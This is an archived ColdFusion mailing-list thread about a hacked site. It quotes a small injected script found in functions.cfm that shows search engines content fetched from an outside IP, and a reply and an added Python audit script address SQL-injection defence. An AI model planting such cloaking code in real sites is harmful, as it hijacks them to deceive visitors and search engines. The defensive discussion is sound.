LOL. Wow. That's a very funny script! Not funny that it happened to you, of
course, but that's just awesome.

Issues like this are typically caused by either SQL injection (i.e. didn't
use cfqueryparam) or some sort of FTP vulnerability. My first step would be
to make sure that *every* cfquery that accepts any input of any kind from
users is utilizing cfqueryparam.

HTH



On Tue, Nov 13, 2012 at 2:57 PM, Les Mizzell <lesm...@bellsouth.net> wrote:

>
> Recently a site of ours got hacked - basically, a Google search of the site
> was returning viagra info!
> What we got was a small script added to the end of a functions.cfm file:
>
> <cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find(
> "google", REQUEST.UserAgent )) >
> <cfhttp method="get"
> url="http://168.16.228.250/fms/
> "><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
>
> I'm not the server admin for this site, so they're sorta pointing the
> finger at us developers, and we're pointing fingers back at them about
> lax server security. We've got a boatload of stuff on this site to
> prevent SQL injection, including Justin D. Scott's application script,
> carefully checking anything that goes into the database, client and server
> side form validation, blah, blah, blah...
>
> Anybody seen the above, and if so, thoughts? Anybody manage to determine
> how the exploit happened to start with?
>
>
> 
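
The check suggested in the reply above (confirm that every cfquery taking input goes through cfqueryparam) can be automated. This is an added example, not code from the thread: a heuristic Python audit whose function name, regexes and constructed sample CFML are assumptions made for illustration.

```python
import re
import sys
from pathlib import Path

# <cfquery ...> ... </cfquery>; group "body" is the SQL text between the tags.
CFQUERY = re.compile(r"<cfquery\b[^>]*>(?P<body>.*?)</cfquery>", re.I | re.S)
# <cfqueryparam ...>; a #expr# inside this tag is bound, not concatenated.
CFQUERYPARAM = re.compile(r"<cfqueryparam\b[^>]*>", re.I | re.S)
# A CFML #expression# still present in the SQL text.
HASH_EXPR = re.compile(r"#([^#\r\n]+)#")

def audit_cfqueries(source, filename="<string>"):
    """Return (filename, line, expression) for every #expr# placed directly
    in cfquery SQL rather than passed through cfqueryparam."""
    findings = []
    for block in CFQUERY.finditer(source):
        # Blank out bound parameters (keeping newlines) and escaped "##",
        # so offsets into the body still map to the original line numbers.
        body = CFQUERYPARAM.sub(
            lambda m: re.sub(r"[^\n]", " ", m.group(0)), block.group("body"))
        body = body.replace("##", "  ")
        for expr in HASH_EXPR.finditer(body):
            offset = block.start("body") + expr.start()
            line = source.count("\n", 0, offset) + 1
            findings.append((filename, line, expr.group(1).strip()))
    return findings

# Constructed sample: one unbound value, then one bound and one unbound value.
SAMPLE = """<cfquery name="getUser" datasource="#request.dsn#">
  SELECT id, name FROM users
  WHERE id = #url.id#
</cfquery>
<cfquery name="getOrder" datasource="#request.dsn#">
  SELECT total FROM orders
  WHERE id = <cfqueryparam value="#url.orderId#" cfsqltype="cf_sql_integer">
    AND status = '#form.status#'
</cfquery>
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # scan a source tree: python audit.py /path/to/webroot
        hits = [h for p in Path(sys.argv[1]).rglob("*.cf[mc]")
                for h in audit_cfqueries(p.read_text(errors="replace"), str(p))]
    else:
        hits = audit_cfqueries(SAMPLE, "sample.cfm")
    for name, line, expr in hits:
        print(f"{name}:{line}: #{expr}# is not wrapped in cfqueryparam")
```

The match is textual, so each hit still needs a manual look: it does not tell user-supplied values from server-side constants, and it does not see SQL assembled in a variable before the cfquery tag.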

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353144